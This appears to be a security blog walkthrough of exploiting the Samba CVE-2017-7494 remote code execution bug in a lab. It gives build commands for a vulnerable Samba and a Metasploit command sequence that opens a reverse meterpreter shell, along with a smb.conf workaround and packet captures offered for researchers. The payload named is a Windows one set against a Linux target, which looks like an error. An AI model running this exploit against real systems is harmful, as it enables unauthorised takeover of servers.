Samba is_known_pipename() CVE-2017-7494 in-the-wild vulnerability exploitation

It looks like of late a spree of critical bugs are giving many sleepless nights to several product vendors/researchers! WannaCry is still on the verge and not over yet and then came Adylkuzz. While people are busy fixing their network for those, yet another Samba bug came and can have devastating impacts on the end-user. The flaw is triggered while an arbitrary shared library is being loaded which further leads to a nice remote code execution into the target applcation context. The bug is extremely simple to reproduce via a one-liner using Metasploit (as per HD Moore's tweet). Anyways here I would be explaining the method on how to exploit this vulnerability on a standard Ubuntu installation and how you can pop a meterpreter session of the target machine. For reproducing this bug I've used the followings:

- Ubuntu 16.04
- Metasploit Framework
- Exploit Module (https://goo.gl/g6e8OU)
- Samba v4.5.9 (one of the vulnerable version)

Let's have a walk-through on how to exploit this bug using metasploit. After the sequence of few commands, I've shared few images and some attack session packet traces (pcaps). This should be helpful for the security researchers out there to come up with the right protections for their corporate products. Lets's get started..

Setup exploitable samba:

$ssh user@target_ip
$cd ~/Desktop
$wget -c "https://download.samba.org/pub/samba/stable/samba-4.5.9.tar.gz"
$tar -zxvf samba-4.5.9.tar.gz
$cd samba-4.5.9
$./configure && make # You need to install libraries here, if required
$sudo make install

#Verify the target version
$./bin/smbd -V

#Start the samba listerner (without running as a daemon) with more debug info
# You may choose the smb.conf which is already present inside testdata directory
$sudo ./bin/smbd -i --debuglevel=6 --configfile=./testdata/samba3/smb.conf

Run these set of commands on attacker host:

$cd ~/metasploit-framework/
$git pull
$./msfconsole
use exploit/linux/samba/is_known_pipename  
show options  
set payload windows/meterpreter/reverse_tcp  
set rhost <target_ip>  
exploit  
boom!! # Enjoy your popped meterpreter session ;)  

Below are some of the exploit run screenshots you can refer as well:

Step 01: Launch msfconsole and choose exploit
Invoke Msfconsole
Step 02: Check target ip and samba version
IP and samba version check
Step 03: Start samba listener for expoitation:
Run samba listener
Step 04: Set Payload and launch exploit!
Run exploit
Step 05: popped shell (meterpreter) !!
Run exploit
Needless to say, how critical and devastating this bug can be in real world environment. If you don't have a appopritate fix, you can have a temporary workaround by adding the following inside [global] directive (file: smb.conf):

nt pipe support = no  

Additionally, there are some ITW Python based proof of concepts. Make sure you have the right vulnerable version along with the patched impacket if you want to reproduce the Python exploit variant.


Packet capture: You can download the packet capture of this attack session for your further analysis from here. This should be helpful for some security researchers out there!


References:
https://isc.sans.edu/diary.html
https://github.com/rapid7/metasploit-framework/pull/8450
https://github.com/omri9741/cve-2017-7494
https://securityonline.info/cve-2017-7494-samba-remote-code-execution-vulnerability/
https://community.rapid7.com/community/infosec/blog/2017/05/25/patching-cve-2017-7494-in-samba-it-s-the-circle-of-life


Peace!!..

Comments powered by Disqus